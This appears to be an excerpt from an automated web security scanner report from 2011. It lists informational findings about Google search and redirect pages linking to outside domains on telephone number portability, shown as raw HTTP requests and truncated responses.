<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:t3mVHetNSfIJ:www.ip-adress.com/whois/scanmedios.com+scanmedios&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCQQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://whois.domaintools.com/scanmedios.com" class=l onmousedown="return clk(this.href,'','','','3','','0CCUQFjAC')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.xomreviews.com/scanmedios.com" class=l onmousedown="return clk(this.href,'','','','4','','0CCsQFjAD')">Mediosone (www <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:cmcaCnzxmXMJ:www.xomreviews.com/scanmedios.com+scanmedios&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CDAQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.markosweb.com/www/scanmedios.com/" class=l onmousedown="return clk(this.href,'','','','5','','0CDIQFjAE')">www.<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Ie-MjeRtXT4J:www.markosweb.com/www/scanmedios.com/+scanmedios&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CDcQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://content.scanmedios.com/" class=l onmousedown="return clk(this.href,'','','','6','','0CDgQFjAF')">content.scanmedios.com/</a>
...[SNIP]...
<h3 class="r"><a href="http://forums.webproxytalk.com/2098-scanmedios.html" class=l onmousedown="return clk(this.href,'','','','7','','0CDoQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:C3zMO3GPqAYJ:forums.webproxytalk.com/2098-scanmedios.html+scanmedios&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CEMQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://scanmedios.com.hypestat.com/" class=l onmousedown="return clk(this.href,'','','','8','','0CEQQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:PqCG498sTLEJ:scanmedios.com.hypestat.com/+scanmedios&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CEkQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.siteslike.com/similar/scanmedios.com" class=l onmousedown="return clk(this.href,'','','','9','','0CEoQFjAI')">Sites Like <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:GvlOlLFyyRIJ:www.siteslike.com/similar/scanmedios.com+scanmedios&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CE8QIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://foontic.net/www.scanmedios.com" class=l onmousedown="return clk(this.href,'','','','10','','0CFAQFjAJ')">www.<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:2PBAhcDj47MJ:foontic.net/www.scanmedios.com+scanmedios&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CFUQIDAJ')">Cached</a>
...[SNIP]...

18.17. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=number+porting+lnp HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=THnvL1Oo2rFB1EyPuENlypklsUgiuRDrggMizX7GcvuSEWk1O1BRhP0HMsig4_tUMgrpgSA4JfKinmjR9Q08mpbqo9YLMeQa1bwUSS3rWNSNQKH_51QqwF1Bj_TupkUW

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:43:57 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/vD843DpA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 81764

<!doctype html> <head> <title>number porting lnp - Google Search</title> <script>window.google={kEI:"TS3LTaDUOqXc0QGA0fSXCQ",kEXPI:"17259,24472,25907,27147,28505,28766,28887,29229,29509,29685,2
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=number+porting+lnp&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Local_number_portability" class=l onmousedown="return clk(this.href,'','','','1','','0CCAQFjAA')"><em>
...[SNIP]...
<div class=osl><a href="http://en.wikipedia.org/wiki/Local_number_portability#History" onmousedown="return clk(this.href,'','','','1','','0CCcQ0gIoADAA')">History</a> - <a href="http://en.wikipedia.org/wiki/Local_number_portability#Portability_schemes" onmousedown="return clk(this.href,'','','','1','','0CCgQ0gIoATAA')">Portability schemes</a> - <a href="http://en.wikipedia.org/wiki/Local_number_portability#Technical_issues" onmousedown="return clk(this.href,'','','','1','','0CCkQ0gIoAjAA')">Technical issues</a> - <a href="http://en.wikipedia.org/wiki/Local_number_portability#Portability_by_country" onmousedown="return clk(this.href,'','','','1','','0CCoQ0gIoAzAA')">Portability by country</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:d4Eb8aOz6OAJ:en.wikipedia.org/wiki/Local_number_portability+number+porting+lnp&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCUQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.fcc.gov/cgb/NumberPortability/" class=l onmousedown="return clk(this.href,'','','','2','','0CCwQFjAB')"><em>
...[SNIP]...
<div class=osl><a href="http://www.fcc.gov/cib/consumerfacts/numbport.html" onmousedown="return clk(this.href,'','','','2','','0CDMQ0gIoADAB')">Your Telephone Number When You ...</a> - <a href="http://www.fcc.gov/cgb/NumberPortability/lnpwaiverpetitions.html" onmousedown="return clk(this.href,'','','','2','','0CDQQ0gIoATAB')">LNP Waiver Petitions &amp; Decisions</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:yIjYu4_V-NMJ:www.fcc.gov/cgb/NumberPortability/+number+porting+lnp&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CDEQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.wireless.att.com/cell-phone-service/transfer-your-number/index.jsp" class=l onmousedown="return clk(this.href,'','','','3','','0CDYQFjAC')">Transfer your <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:jOPjUbcq1MIJ:www.wireless.att.com/cell-phone-service/transfer-your-number/index.jsp+number+porting+lnp&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CDsQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.wirelessadvisor.com/wireless-local-number-portability" class=l onmousedown="return clk(this.href,'','','','4','','0CD0QFjAD')">Wireless <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:QL8BYk-aK2gJ:www.wirelessadvisor.com/wireless-local-number-portability+number+porting+lnp&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CEIQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.qwest.com/wholesale/pcat/lnp.html" class=l onmousedown="return clk(this.href,'','','','5','','0CEQQFjAE')">Qwest | Wholesale | Local <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:x6NviN5neVgJ:www.qwest.com/wholesale/pcat/lnp.html+number+porting+lnp&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CEkQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.inphonex.com/services/local-number-portability.php" class=l onmousedown="return clk(this.href,'','','','6','','0CEsQFjAF')">InPhonex Local <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ZYrUCwFnXw4J:www.inphonex.com/services/local-number-portability.php+number+porting+lnp&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CFAQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.voip-info.org/index.php?content_id=4313" class=l onmousedown="return clk(this.href,'','','','7','','0CFIQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:s1CZWP6-YAwJ:www.voip-info.org/index.php%3Fcontent_id%3D4313+number+porting+lnp&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:s1CZWP6-YAwJ:www.voip-info.org/index.php%3Fcontent_id%3D4313+number+porting+lnp&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com','','','','7','','0CFcQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ported.com/midlnp.htm" class=l onmousedown="return clk(this.href,'','','','8','','0CFgQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:AkKZNgpdNG8J:www.ported.com/midlnp.htm+number+porting+lnp&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CF0QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.8x8.com/Resources/Learn/TransferringNumber.aspx" class=l onmousedown="return clk(this.href,'','','','9','','0CF8QFjAI')">VoIP Transfer <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:WuKPOPqfSOsJ:www.8x8.com/Resources/Learn/TransferringNumber.aspx+number+porting+lnp&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CGQQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.varphonex.com/services/local-number-portability.php" class=l onmousedown="return clk(this.href,'','','','10','','0CGYQFjAJ')">Local <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:rQHXqJ79c8YJ:www.varphonex.com/services/local-number-portability.php+number+porting+lnp&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CGsQIDAJ')">Cached</a>
...[SNIP]...

18.18. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=7&ved=0CFQQFjAG&url=http%3A%2F%2Fwww.virtual-phone-number.org%2Findex.php%3Ftitle%3DLocal_Number_Portability_(LNP)%26redirect%3Dno&ei=mS3LTaatBIXc0QHL49DbCA&usg=AFQjCNFZvt6UMgHLMTLnnquQ4-rgdrUR2Q HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 302 Found
Location: http://www.virtual-phone-number.org/index.php?title=Local_Number_Portability_(LNP)&redirect=no
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 00:46:07 GMT
Server: gws
Content-Length: 295
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.virtual-phone-number.org/index.php?title=Local_Number_Portability_(LNP)&amp;redirect=no">here</A>
...[SNIP]...

18.19. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=8&ved=0CFoQFjAH&url=http%3A%2F%2Fnetvoipcommunications.com%2Fadditional-services.html&ei=mS3LTaatBIXc0QHL49DbCA&usg=AFQjCNGfl5B0e2HD7DpZKbBuz_TUyCMMlQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 302 Found
Location: http://netvoipcommunications.com/additional-services.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 00:46:14 GMT
Server: gws
Content-Length: 254
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://netvoipcommunications.com/additional-services.html">here</A>
...[SNIP]...

18.20. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=5&ved=0CDIQFjAE&url=https%3A%2F%2Flnp.activationnow.com%2Flnp%2F&ei=Yi3LTfrUPOjz0gGrxNysCg&usg=AFQjCNHF7ZWuhtryZ0kWKCLF7bL-RcTJrg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 302 Found
Location: https://lnp.activationnow.com/lnp/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 00:44:45 GMT
Server: gws
Content-Length: 231
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="https://lnp.activationnow.com/lnp/">here</A>
...[SNIP]...

18.21. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=2&ved=0CDQQFjAB&url=http%3A%2F%2Fwww.onwav.com%2Flnp&ei=mS3LTaatBIXc0QHL49DbCA&usg=AFQjCNGjDwcGuGT-B8V_1d8p_Ajfq3gw8Q HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 302 Found
Location: http://www.onwav.com/lnp
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 00:45:46 GMT
Server: gws
Content-Length: 221
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.onwav.com/lnp">here</A>
...[SNIP]...

18.22. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain: